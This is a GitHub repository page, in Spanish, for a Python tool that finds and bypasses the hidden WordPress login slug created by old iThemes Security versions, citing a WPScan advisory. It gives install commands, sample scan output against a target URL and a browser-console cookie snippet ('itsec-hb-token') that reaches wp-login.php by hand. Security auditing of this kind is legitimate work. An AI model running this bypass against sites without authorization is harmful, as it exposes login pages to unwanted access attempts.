Skip to content

🔓 Herramienta para detectar y explotar slugs ocultos creados por versiones antiguas del plugin iThemes Security en WordPress. Basado en la vulnerabilidad documentada por WPScan que permite eludir el ocultamiento de wp-login.php.

Notifications You must be signed in to change notification settings

AndreewNR/Bypass_IthemeSecurity

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🔓 Bypass_iThemesSecurity

Herramienta de detección y explotación de slugs ocultos generados por el plugin iThemes Security en instalaciones WordPress mal configuradas o desactualizadas.

⚠️ Basada en la vulnerabilidad documentada en:
WPScan Advisory - iThemes Security <= 8.1.2


🧠 ¿Qué hace esta herramienta?

Bypass_iThemesSecurity automatiza la detección de tokens (slugs) ocultos usados por iThemes Security para mover el acceso al panel de login de WordPress (wp-login.php). Si el sitio está desactualizado o mal configurado, esta herramienta puede encontrar ese slug y permitir el bypass completo del ocultamiento.


🎯 Casos de uso

  • Red Teams y Pentesters que necesiten evadir plugins de ocultamiento de login.
  • Auditores de seguridad en entornos WordPress.
  • Investigadores de seguridad interesados en fingerprinting de instalaciones WordPress.
  • Cazadores de bugs que validan configuraciones erróneas.

🚀 Requisitos

  • Python 3.7+
  • Librerías:
    • requests
    • beautifulsoup4
    • rich
    • pyfiglet

📥 Instalación

1. Clonar el repositorio

git clone https://github.com/AndreewNR/Bypass_IthemeSecurity.git
cd Bypass_iThemesSecurity

2. Instalar dependencias

pip install -r requirements.txt

⚙️ Uso

Ejecuta la herramienta con:

python main.py

🧪 Ejemplo de uso

[+] Ingresa la URL objetivo (sin / al final): https://tudominio.com

🔍 Iniciando escaneo de slugs ocultos en: https://tudominio.com

🔄 Probando slug: 6bcbbd3fc2 🔄 Probando slug: loginadmin 🔄 Probando slug: abc123...

✅ ¡Bypass exitoso! Slug válido: loginadmin 🔗 Accede directamente: https://tudominio.com/wp-login.php

🍪 ¿Y si quieres probar el bypass manualmente?

Puedes simular el bypass en el navegador usando cookies. Si la herramienta detecta un slug válido y entrega cookies, puedes abrir la consola de tu navegador (F12) y ejecutar:

document.cookie = "itsec-hb-token=loginadmin";
window.location.href = "/wp-login.php";

⚠️ Descargo de responsabilidad

Esta herramienta es solo para fines educativos y auditorías autorizadas. El uso no ético o en sistemas sin permiso explícito podría violar leyes locales. Autores y colaboradores no se hacen responsables del uso indebido de este software.

About

🔓 Herramienta para detectar y explotar slugs ocultos creados por versiones antiguas del plugin iThemes Security en WordPress. Basado en la vulnerabilidad documentada por WPScan que permite eludir el ocultamiento de wp-login.php.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages